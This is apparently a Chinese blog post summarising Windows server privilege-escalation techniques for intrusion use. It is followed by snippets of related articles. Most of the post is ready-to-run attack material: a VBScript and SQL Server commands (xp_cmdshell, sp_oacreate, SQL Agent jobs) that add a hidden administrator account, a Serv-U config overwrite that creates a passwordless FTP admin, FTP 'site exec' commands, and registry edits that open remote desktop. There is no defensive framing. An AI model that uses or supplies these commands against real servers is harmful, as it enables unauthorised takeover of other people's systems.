服务器提权总结

最新推荐文章于 2022-01-23 16:28:34 发布
最新推荐文章于 2022-01-23 16:28:34 发布
阅读量1.2k 收藏
点赞数
分类专栏: 入侵渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mengzaifei6/article/details/8843842
版权

迅雷下载提权

<script language="VBScript">
Set vbs = CreateObject("Wscript.Shell")
vbs.run "cmd /c net user book book /add",0
vbs.run "cmd /c net localgroup administrators book /add",0
</script>


PCAnywhere连接提权

跳转C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\   下载 .cif文件  破解后远程登录


erveryone完全控制执行程序

c:\winnt\system32\inetsrv\data\    把文件上传到这个目录里面执行  该目录通常是erveryone完全控制权限


adsutil.vbs提权

查看C:\Inetpub\AdminScripts\ 下是否有adsutil.vbs脚本,如果有执行:
cscript C:\Input\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
即可提升IIS_USER权限


系统启动提权利用

在C:\Document and Settings\All Users\[开始]菜单\程序\启动  写入bat,vbs脚本 通过ddos强制重启,也可以在根目录下隐藏autorun.inf


流行的Serv-U密码覆盖提权

在C:\Document and Settings\All Users\[开始]菜单\程序  目录中查看Serv-U的安装路径,进入安装路径后查看该文件夹目录的权限和写入权限,可以修改
覆盖Serv-U的配置文件,Serv-U Daemon.ini  进行提权
下面为Serv-U的配置模板
  [User=用户名|1|0]  //用户名后的数字设置用户是否生效,1表示有效,0表示无效
  Password=          //用于设置密码,密码规则为随机的两个字母+密码的32位MD5
  HomeDir=d:\        //设置登录时的工作目录
  PasswordLastChange=1234233287   //设置上次密码更改的时间
  TimeOut=600        //设置连接超时时间
  Access1=C:\|RWAMELCDP   //设置可访问目录属性权限,这里是所有控制权,包括读,写,移动,复制和执行
  Access2=D:\|RWAMELCDP   //同上

  [USER=book|1]
  Password=
  HomeDir=c:\
  TimeOut=600
  Maintenance=System
  Access1=c:\|RWAMELCDP
  Access1=d:\|RWAMELCDP
  Access1=f:\|RWAMELCDP
  SKEYvalues=
  可以添加一个用户名为book,密码为空的Serv-U FTP服务器管理用户
  利用FTP登录,执行命令
  quote site exec <cmd命令>

  quote site exec net user book book /add
  quote site exec net localgroup administrators book /add
  quote site exec tskill notepad PID  //在window2003中通过pid关闭同类的进程
  quote site exec net stop iisadmin   //停止IIS服务
  quote site exec net start iisadmin  //启动IIS服务

  
  sql提权

  通过and 1=(select IS_SRVROLEMEMBER('sysadmin')) 可以判断当前用户是否有sysadmin权限

  select COUNT(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'   查看xp_cmdshell存储扩展是否删除

  Eexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'   恢复存储过程   如果不能成功上传一个xplog70.dll

  exec master .. xp_cmdshell 'net user book book /add'   添加用户

  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\   其中键值fDenyTSConnections控制着3389的开启和关闭,当
                                                                                键值为0时表示3389开启,为1时表示关闭

  exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0
                                                                        通过注册表开通3389,在sql里面执行这句命令

  Exec master.dbo.addextendedproc 'xp_cmdshell','C:\Windows\System32\xplog70.dll'
                                                        如果xp_cmdshell命令被删除了,这句代码可以恢复

  恢复执行xp_cmdshell存储过程时遇到的常见情况

 1.未能找到存储过程'master..xp_cmdshell'
 
   执行  Exec sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int   或者

         sp_addextendedproc 'xp_cmdshell','xplog70.dll'

   一些版本中没有xplog70.dll,用以下语句恢复
          
         sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  2.无法装载DLLxpsql70.dll或该DLL所引用的某一Dll出现错误的原因:原因为126(找不到指定模板)

    错误原因:通常是由于系统中不存在xpsql70.dll文件造成的,可以上传一个xpsql70.dll文件,并执行如下命令

         sp_dropextendedproc "xp_cmdshell";

         sp_addextendedproc 'xp_cmdshell', 'c:\xpsql70.dll'  需要指定xpsql70.dll,也可以上传xplog70.dll文件

  3.sp_addextendedproc存储过程的恢复

        在上面的恢复过程中,离不开sp_addextendedproc存储过程添加新建xp_cmdshell函数,进行恢复时,可能出现一种情况:未能找到存储过程'sp_addextendedproc'
 
        说明sp_addextendedproc存储过程已经被删除,此时需要手工恢复次存储过程,才能完成xp_cmdshell的恢复,执行:

        create procedure sp_addextendedproc
        @functname nvarchar(517),
        @dllname varchar(255)
        as
        set implicit_transactions off
        if @@trancount > 0
        begin
        raiserror(15002,-1,-1,'sp_addextendedproc')
        return(1)
        end
        dbcc addextendedproc(@functname,@dllname)
        return (0)
        GO

      绕过sp_addextendedproc扩展,直接恢复xp_cmdshell

       Exec spdropextendedproc 'xp_cmdshell';
       dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

 
   通过创建ActiveX提权

    declare @o int
    exec sp_oacreate 'wscript.shell',@o out
    exec sp_oamethod @o, 'run',NULL,'net start telnet'

   如果执行命令无法成功,需要指定cmd命令程序的路径。在Windows2000Servser系统中可以执行

   declare @shell int
   exec sp_oacreate 'wscript.shell',@shell output
   exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user book book /add'

   declare @shell int
   exec sp_oacreate 'wscript.shell',@shell output
   exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators book /add'

   在windowXP或2003Server系统中,执行

      declare @shell int
   exec sp_oacreate 'wscript.shell',@shell output
   exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user book book /add'

   declare @shell int
   exec sp_oacreate 'wscript.shell',@shell output
   exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators book /add'

   利用SQL代理提权

   exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'  开启服务

   use msdb exec sp_delete_job null,'x'
   exec sp_add_job 'x'
   exec sp_add_jobstep Null,'x',null,'1','CMDEXEC','cmd /c net user book book /add'    添加用户
   exec sp_add_jobserver null,'x',@@SERVERNAME exec sp_start_job 'x'

 

   权限不够时运行test.vbs

   set wsnetwork=CreateObject("WSCRIPT.NETWORK")
   os="WinNT://"&wsnetwork.ComputerName
   Set ob=GetObject(os) 
   Set oe=GetObject(os&"/Administrators,group")
   Set od=ob.Create("user","book")
   od.SetPassword "book"
   od.SetInfo
   Set of=GetObject(os&"/book",user)
   oe.add os&"/book"

   执行命令:cscript test.vbs

修改3389端口

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\Wds\Repwd\Tds\tcp   ProtNumber

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp   PortNumber 

梦在飞翔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【安全牛学习笔记】MSsql2005(Sa)权限执行命令总结
edu_aqniu的博客
10-31 690
​一.xp_cmdshell EXEC master..xp_cmdshell 'ipconfig' 开启xp_cmdshell: -- To allow advanced options to be changed. EXEC sp_configure 'show advanced options', 1 GO -- To update the current
webshell提权教程
06-12
总结,Webshell提权是一项涉及系统安全、网络攻防的重要技能。了解其原理、技巧并采取相应的防护措施,对于保障网络安全至关重要。在实际操作中,应遵循法律法规,合法合规地进行安全研究和防护工作。
服务器提权
u011215939的博客
12-19 1677
服务器提权提权原理什么是提权提权,顾名思义就是提高自己在操作系统中的权限,就比如在windows中你本身登录的用户是guest,然后通过提权后就变成超级管理员,拥有了管理Windows的所有权限。提权是黑客的专业名词,一般用于网站入侵和系统入侵中。 web服务器提权: 通过基础的漏洞,在服务器上getshell或者获取到一定的访问权限,然后通过探查获取更多的权限,最终获取到管理员的权限
提 权
weixin_46273733的博客
01-23 1484
提权 攻击者对服务器提权一般分为两种: 一种是溢出提权,另一种是第三方组件提权。 溢出提权 溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 root权限,其中溢出提权又分为远程溢出与本地溢出。 远程溢出是指攻击者只需要与服务器建立连接,然后根据系统的漏洞,使用相应的溢出程序,即可获取到远程服务器的 root权限。 本地溢出,攻击者首先需要有服务器一个用户,且需要有执行权限的用户才可能发起提权。攻击者通常会向服务器上传本地溢出程序,在服务器端执行。如果系统存在漏洞,那么将
sa执行命令方法总结
weixin_33805992的博客
10-30 332
sa执行命令方法总结 转载请注明来源:BK瞬间群 测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动) 一.xp_cmdshellEXEC master..xp_cmdshell 'ipconfig' 开启xp_cmdshell: -- To allow advanced options to be changed. EXEC sp...
河马mysql弱口令_网络安全渗透第8节课笔记
weixin_39884492的博客
01-20 370
提权:防护措施:在Windows中安装apache后,要单独为其创建一个账户,只给启动服务的权限,防止攻击者通过apache直接获得system权限,Linux同理。IIS中网站为什么使用匿名登录?任何windows服务都会对应一个账号来运行:Windows安装IIS后,在计算机管理---系统工具---本地用户和组---用户中都会有IUSER和IWAM两个用户,IUSER可以匿名访问内置账户。打开...
权限提升-linux提权手法总结.zip
05-08
以下是对"权限提升——Linux提权手法总结"的详细说明: 1. **缓冲区溢出(Buffer Overflow)**:这是经典的提权漏洞。当程序处理用户输入时,如果没有正确检查边界,可能会导致内存溢出,从而覆盖函数返回地址,...
IIS6提权工具
10-18
总结来说,IIS6提权是一个严重的安全问题,需要管理员高度重视。通过理解提权的原理和工具,我们可以更好地进行防御和应急响应。同时,使用"IIS6up"这样的工具,可以帮助我们检查系统的安全状况,及时发现并修复潜在...
mssql,mysqll注入语法.zip_KMF_security_提权
09-24
4. **提权技术**:攻击者通过SQL注入可能获取数据库用户的权限,进一步可能尝试利用数据库服务器与操作系统之间的交互来提升到操作系统级别的权限,如通过xp_cmdshell等扩展存储过程在mssql中进行提权。 5. **渗透...
sudo提权项目详细笔记文档总结
最新发布
07-02
sudo 提权项目详细笔记文档总结 本文档总结了sudo 提权项目的详细笔记,包括项目需求、收集员工职能和对应权限、sudo 设置注意事项、模拟创建用户角色实践等方面的知识点。 一、项目需求 sudo 提权项目的主要需求...
记一次艰难的sql提权
weixin_30325793的博客
07-18 122
昨晚没关机 扫了一夜 扫到一个3389,而且开着1433,且1433的sa账户是空口令。 遂大喜。 第一步:尝试xp_cmdshell xp_cmdshell'dirc:/>>r.txt' 提示找不到xplog70.dll,于是我恢复一下xp_cmdshell试试 execsp_dropextendedproc'xp_cmdshell'dbccaddext...
通过FTP进行突破IP筛选
cnbird's blog
05-14 687
quote site exec "cacls.exe d: /e /t /g everyone:F" #把d盘设置为everyone可以浏览这样一会导出文件放D盘就可以下载了... quote site exec "regedit -e D:/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip" #导出注册表里关于TCP/IP筛
一次实战记录
weixin_40709439的博客
03-08 2115
前几天遇到了个挺坑的网站 是dedecms,一发现是它,我第一时间利用/data/admin/ver.txt 得到更新年份20170504 查看官网的历史版本信息,发现是dedecms v7.5 sp2 版本 记得这个版本存在前台search.php文件的注入漏洞、前台任意用户密码重置漏洞、前台cookie伪造登陆到管理员前台账号,再利用前台管理员用户重置后台管理员的密码。从而进入后台进行get...
关于怎样提权的小帖子
王意林的专栏
09-27 7075
牛逼版本 http://blog.csdn.net/eldn__/article/details/8452242 常见版本 http://www.jb51.net/hack/21297.html http://hi.baidu.com/happy8d/item/6839edc2ba343953ac00efcc http://www.webshell.cc/tag/tiquan http
html自动增加vbs代码,HTML_vbs加administrator用户的代码,set wsnetwork=CreateObject("WSCRIPT.NETW - phpStudy...
weixin_35828255的博客
05-31 129
vbs加administrator用户的代码set wsnetwork=CreateObject("WSCRIPT.NETWORK")os="WinNT://"&wsnetwork.ComputerNameSet ob=GetObject(os) '得到adsi接口,绑定Set oe=GetObject(os&"/Administrators,group") '属性,admin组S...
FTP提升权限关键命令
无轩居 (Home of vip)
09-05 2910
Quote site exec net.exe user wofeiwo /add Quote site exec net.exe localgroup administrators wofeiwo /add
服务器系统获取最高权限,webshell+servu获取系统最高权限
weixin_35970228的博客
08-05 694
您正在看的ftp服务器教程是:webshell+servu获取系统最高权限。下面详细说说webshell+serv-u获取系统最高权限的方法及补救方法。原理:serv-u默认监听127.0.0.1:43958,在本机才能连接这个管理端口,serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -...
九种经典Webshell提权
寒冬玉
03-24 665
第一  如果服务器上有装了pcanywhere服务端,管理员为了管理方便  也给了我们方便,到系统盘的Documents and Settings/All Us  ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地  破解就使用pcanywhere连接就ok了  第二  有很多小黑问我这么把webshell的iis user权限提升  一般服务器
网络攻防技巧:提权与渗透经验总结
"这篇总结主要涵盖了渗透测试中的提权和攻击技术,由网络安全领域的专家Nuclear'Atk收集和整理,并且在社区内进行了讨论和补充。文章内容包括但不限于网络攻防策略、提权技巧和Webshell利用方法。" 在渗透测试中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值